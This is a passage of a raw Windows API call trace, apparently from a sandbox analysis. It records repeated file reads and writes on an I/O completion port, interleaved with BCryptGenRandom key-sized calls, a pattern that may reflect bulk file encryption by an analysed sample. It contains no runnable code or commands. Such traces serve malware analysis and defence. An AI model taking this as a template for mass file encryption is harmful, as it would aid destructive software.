lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.644] CloseHandle (hObject=0x338) returned 1 [0175.644] free (_Block=0x3df0008) [0175.644] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.665] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1aba, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.666] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.666] CloseHandle (hObject=0x338) returned 1 [0175.666] free (_Block=0x3df0008) [0175.667] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.679] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x584, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.679] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.679] CloseHandle (hObject=0x2a4) returned 1 [0175.680] free (_Block=0x1ff1e60) [0175.680] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.691] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1652, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.692] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.692] CloseHandle (hObject=0x338) returned 1 [0175.692] free (_Block=0x3df0008) [0175.692] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.705] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x16c0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.705] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.705] CloseHandle (hObject=0x2a4) returned 1 [0175.706] free (_Block=0x1ff1e60) [0175.706] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.714] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x5d0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.714] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.715] CloseHandle (hObject=0x338) returned 1 [0175.715] free (_Block=0x3df0008) [0175.715] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.731] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x62b6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.732] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.732] CloseHandle (hObject=0x338) returned 1 [0175.732] free (_Block=0x3df0008) [0175.732] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.752] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x6302, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.753] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.753] CloseHandle (hObject=0x338) returned 1 [0175.753] free (_Block=0x3df0008) [0175.753] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.765] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3636, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.766] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.767] CloseHandle (hObject=0x2a4) returned 1 [0175.767] free (_Block=0x1ff1e60) [0175.767] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.779] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x16478, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.780] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.781] CloseHandle (hObject=0x338) returned 1 [0175.781] free (_Block=0x3df0008) [0175.781] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.785] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1758, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.785] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.786] CloseHandle (hObject=0x2a4) returned 1 [0175.786] free (_Block=0x1ff1e60) [0175.786] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.815] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.815] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0175.815] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.816] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0175.816] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.816] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.816] free (_Block=0x3e305b8) [0175.816] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.816] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.817] free (_Block=0x1fa91d0) [0175.817] free (_Block=0x1fa2ed8) [0175.817] free (_Block=0x1fa90b8) [0175.817] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.817] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.824] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.825] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0175.825] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.825] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0175.826] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.826] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.826] free (_Block=0x3e305b8) [0175.826] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.826] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.826] free (_Block=0x1fa91d0) [0175.826] free (_Block=0x1fa2ed8) [0175.826] free (_Block=0x1fa90b8) [0175.826] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0175.827] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.843] CloseHandle (hObject=0x338) returned 1 [0175.843] free (_Block=0x1ff1e60) [0175.843] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.860] CloseHandle (hObject=0x3cc) returned 1 [0175.860] free (_Block=0x3d70450) [0175.860] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.874] ReadFile (in: hFile=0x2a8, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x543a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0175.888] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.912] CloseHandle (hObject=0x2a8) returned 1 [0175.912] free (_Block=0x3ef0008) [0175.912] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.916] CloseHandle (hObject=0x338) returned 1 [0175.916] free (_Block=0x1ff1e60) [0175.916] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.917] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x28b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0175.917] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.917] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x36e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0175.918] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.926] CloseHandle (hObject=0x3cc) returned 1 [0175.926] free (_Block=0x3d70450) [0175.927] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.946] CloseHandle (hObject=0x3cc) returned 1 [0175.946] free (_Block=0x3df0008) [0175.946] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.960] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1898, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.961] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.961] CloseHandle (hObject=0x2a4) returned 1 [0175.961] free (_Block=0x1ff1e60) [0175.961] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.970] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x29f8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.971] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.976] CloseHandle (hObject=0x3cc) returned 1 [0175.976] free (_Block=0x3df0008) [0175.976] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.988] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x28b4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.989] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.989] CloseHandle (hObject=0x2a4) returned 1 [0175.989] free (_Block=0x1ff1e60) [0175.989] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.002] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1b0c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0176.003] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.003] CloseHandle (hObject=0x3cc) returned 1 [0176.004] free (_Block=0x3df0008) [0176.004] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.016] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1bf8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0176.017] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.017] CloseHandle (hObject=0x2a4) returned 1 [0176.018] free (_Block=0x1ff1e60) [0176.018] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.030] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1270, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0176.031] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.031] CloseHandle (hObject=0x3cc) returned 1 [0176.031] free (_Block=0x3df0008) [0176.031] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.041] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x25ac, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0176.042] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.043] CloseHandle (hObject=0x2a4) returned 1 [0176.043] free (_Block=0x1ff1e60) [0176.043] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.056] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1f5c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0176.057] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.057] CloseHandle (hObject=0x2a4) returned 1 [0176.058] free (_Block=0x3df0008) [0176.058] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.070] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2944, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0176.074] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.074] CloseHandle (hObject=0x2a4) returned 1 [0176.074] free (_Block=0x3df0008) [0176.074] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0176.130] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.131] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0176.131] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.131] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0176.133] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.133] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.133] free (_Block=0x3e305b8) [0176.133] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.133] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.134] free (_Block=0x1fa91d0) [0176.134] free (_Block=0x1fa2ed8) [0176.134] free (_Block=0x1fa90b8) [0176.134] 